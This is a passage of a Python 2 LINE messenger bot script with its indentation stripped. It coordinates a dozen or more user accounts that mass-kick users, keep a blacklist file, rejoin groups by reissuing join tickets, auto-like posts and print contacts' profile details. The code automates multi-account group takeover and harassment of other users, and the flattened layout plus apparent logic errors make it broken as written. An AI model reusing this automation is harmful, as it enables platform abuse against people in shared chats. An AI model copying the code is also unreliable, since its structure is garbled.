if op.param3 in Bmid:
if op.param2 in Emid:
G = kt.getGroup(op.param1)
G.preventJoinByTicket = False
kt.updateGroup(G)
Ticket = kt.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
kt.updateGroup(G)
Ticket = kt.reissueGroupTicket(op.param1)
#=========================================================================
if op.type == 15:
if wait["autorein"] == True:
if op.param2 in admin:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
kicker.inviteIntoGroup(op.param1,[op.param2])
#===========================================
if op.type == 32:
if not op.param2 in Bots and admin:
if wait["protectionOn"] == True:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if Amid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
ki.rejectGroupInvitation(op.param1)
else:
ki.acceptGroupInvitation(op.param1)
else:
ki.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
ki.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
ki.cancelGroupInvitation(op.param1, matched_list)
if Bmid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
kk.rejectGroupInvitation(op.param1)
else:
kk.acceptGroupInvitation(op.param1)
else:
kk.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
kk.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
kk.cancelGroupInvitation(op.param1, matched_list)
if Cmid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
kc.rejectGroupInvitation(op.param1)
else:
kc.acceptGroupInvitation(op.param1)
else:
kc.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
kc.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("^^",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
kc.cancelGroupInvitation(op.param1, matched_list)
if op.type == 17:
if op.param3 in wait["blacklist"]:
if not op.param2 in Bots and admin:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param3])
cl.sendText(op.param1,"blacklist users are not allowed to sign in -_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param3}
cl.sendMessage(c)
if op.type == 17:
if wait["welcomemsg"] == True:
if op.param2 not in Bots:
ginfo = cl.getGroup(op.param1)
cl.sendText(op.param1,cl.getContact(op.param2).displayName + wait["welmsg"]+ str(ginfo.name))
if op.type == 11:
if not op.param2 in Bots:
if wait["qr"] == True:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = True
kicker.updateGroup(G)
except Exception, e:
print e
if op.type == 11:
if not op.param2 in Bots and admin:
if wait["protectionOn"] == True:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = True
kicker.updateGroup(G)
kicker.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = True
kicker.updateGroup(G)
cl.sendText(op.param1,"please do not open link group-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
except Exception, e:
print e
if op.type == 13:
G = cl.getGroup(op.param1)
I = G.creator
if not op.param2 in Bots and admin:
if wait["protectionOn"] == True:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
if G is not None:
gInviMids = [contact.mid for contact in G.invitee]
kicker.cancelGroupInvitation(op.param1, gInviMids)
kicker.kickoutFromGroup(op.param1,[op.param2])
cl.sendText(op.param1,"you are prohibited from inviting-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
if op.type == 11:
if wait["pelaku"] == True:
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
if op.type == 13:
if wait["pelaku"] == True:
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
if op.type == 19:
if wait["pelaku"] == True:
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
print "mnunjukan plaku"
if op.type == 15:
if op.param2 in admin:
random.choice(KAC).inviteIntoGroup(op.param1,[op.param2])
if op.type == 19:
if op.param2 in Bots:
if op.param3 in admin:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
if op.type == 19:
if not op.param2 in Bots:
if op.param3 in admin:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.type == 19:
if not op.param2 in Bots:
try:
gs = ki.getGroup(op.param1)
gs = kk.getGroup(op.param1)
targets = [op.param2]
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
pass
except Exception, e:
print e
if not op.param2 in Bots and admin:
if wait["Backup"] == True:
try:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if not op.param2 in Bots and admin:
if wait["protectionOn"] == True:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = False
kicker.updateGroup(G)
invsend = 0
Ticket = kicker.reissueGroupTicket(op.param1)
kl.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.2)
X = kicker.getGroup(op.param1)
X.preventJoinByTicket = True
kl.kickoutFromGroup(op.param1,[op.param2])
kicker.kickoutFromGroup(op.param1,[op.param2])
kl.leaveGroup(op.param1)
kicker.updateGroup(X)
except Exception, e:
print e
if not op.param2 in Bots and admin:
try:
gs = ki.getGroup(op.param1)
gs = kk.getGroup(op.param1)
targets = [op.param2]
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
pass
except Exception, e:
print e
if not op.param2 in Bots and admin:
if wait["Backup"] == True:
try:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if op.type == 19:
if mid in op.param3:
if op.param2 in Bots:
pass
try:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ti = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid in op.param3:
if op.param2 in Bots:
pass
try:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki.getGroup(op.param1)
X.preventJoinByTicket = True
ki.updateGroup(X)
Ticket = ki.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Bmid in op.param3:
if op.param2 in Bots:
pass
try:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kk.getGroup(op.param1)
X.preventJoinByTicket = True
kk.updateGroup(X)
Ticket = kk.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Cmid in op.param3:
if op.param2 in Bots:
pass
try:
kd.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kd.getGroup(op.param1)
X.preventJoinByTicket = False
kd.updateGroup(X)
Ti = kd.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kc.getGroup(op.param1)
X.preventJoinByTicket = True
kc.updateGroup(X)
Ticket = kc.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Dmid in op.param3:
if op.param2 in Bots:
pass
try:
ke.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ke.getGroup(op.param1)
X.preventJoinByTicket = False
ke.updateGroup(X)
Ti = ke.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kd.getGroup(op.param1)
X.preventJoinByTicket = True
kd.updateGroup(X)
Ticket = kd.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Emid in op.param3:
if op.param2 in Bots:
pass
try:
kf.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kf.getGroup(op.param1)
X.preventJoinByTicket = False
kf.updateGroup(X)
Ti = kf.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = ke.getGroup(op.param1)
X.preventJoinByTicket = True
ke.updateGroup(X)
Ticket = ke.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
#========================================================================
if Fmid in op.param3:
if op.param2 in Bots and admin:
pass
try:
kg.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kg.getGroup(op.param1)
X.preventJoinByTicket = False
kg.updateGroup(X)
Ti = kg.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kf.getGroup(op.param1)
X.preventJoinByTicket = True
kf.updateGroup(X)
Ticket = kf.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Gmid in op.param3:
if op.param2 in Bots:
pass
try:
kh.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kh.getGroup(op.param1)
X.preventJoinByTicket = False
kh.updateGroup(X)
Ti = kh.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kg.getGroup(op.param1)
X.preventJoinByTicket = True
kg.updateGroup(X)
Ticket = kg.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Hmid in op.param3:
if op.param2 in Bots:
pass
try:
kj.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kj.getGroup(op.param1)
X.preventJoinByTicket = False
kj.updateGroup(X)
Ti = kj.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kh.getGroup(op.param1)
X.preventJoinByTicket = True
kh.updateGroup(X)
Ticket = kh.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Jmid in op.param3:
if op.param2 in Bots:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
G = cl.getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ti = cl.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kj.getGroup(op.param1)
X.preventJoinByTicket = True
kj.updateGroup(X)
Ticket = kj.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Nmid in op.param3:
if op.param2 in Bots:
pass
try:
ko.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
G = ko.getGroup(op.param1)
G.preventJoinByTicket = False
ko.updateGroup(G)
Ti = ko.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kn.getGroup(op.param1)
X.preventJoinByTicket = True
kn.updateGroup(X)
Ti = kn.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
#============================================================================
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 25:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == admin:
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
X = cl.getGroup(list_[1])
X.preventJoinByTicket = True
cl.updateGroup(X)
except:
cl.sendText(msg.to,"error")
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata("line://home/post?userMid="+mid+"&postId="+"new_post")
cl.like(url[25:58], url[66:], likeType=1001)
ki.like(url[25:58], url[66:], likeType=1001)
kk.like(url[25:58], url[66:], likeType=1001)
kc.like(url[25:58], url[66:], likeType=1001)
kt.like(url[25:58], url[66:], likeType=1001)
ks.like(url[25:58], url[66:], likeType=1001)
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"already")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"decided not to comment")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Deleted")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"It is not in the black list")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"already in the blacklist")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"successfully load users into the blacklist")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"successfully removed from the blacklist")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"It is not in the black list")
elif wait["contact"] == True:
msg.contentType = 0
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"⎈ Profile Name :\n" + msg.contentMetadata["displayName"] + "\n\n⎈ Mid :\n" + msg.contentMetadata["mid"] + "\n\n⎈ Status Message :\n" + contact.statusMessage + "\n\n⎈ Pict Status :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\n⎈ Cover Status :\n" + str(cu) + "\n\n [☸]➦Powered By: メTamii々•┅─────")
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"⎈ Profile Name :\n" + contact.displayName + "\n\n⎈ Mid :\n" + msg.contentMetadata["mid"] + "\n\n⎈ Status Mesage:\n" + contact.statusMessage + "\n\n⎈ Pict Status :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\n⎈ Cover Status :\n" + str(cu) + "\n\n [☸]➦Powered By: メTamii々•┅─────")
elif msg.contentType == 16:
if wait["contact"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["Help","help"]:
if msg.from_ in admin:
print "\nHelp pick up..."
if wait["lang"] == "JP":
cl.sendText(msg.to, helpMessage + datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["Textspeech","textspeech","TextSpeech"]:
if msg.from_ in admin:
print "\nHelp pick up..."
if wait["lang"] == "JP":
cl.sendText(msg.to, textspeech + datetime.today().strftime('%H:%M:%S'))
elif ("Group name:" in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Group name:","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["winvite"] == True:
if msg.from_ in admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
cl.sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
ki.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
ki.sendText(msg.to,"Call my owner to use command !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
cl.sendText(msg.to,"Done Invite : \n➡" + _name)
wait["winvite"] = False
break
except:
try:
ki.findAndAddContactsByMid(invite)
ki.inviteIntoGroup(op.param1,[invite])
wait["winvite"] = False
except:
cl.sendText(msg.to,"Negative, Error detected")
wait["winvite"] = False
break
elif "Invite:" in msg.text:
if msg.from_ in admin:
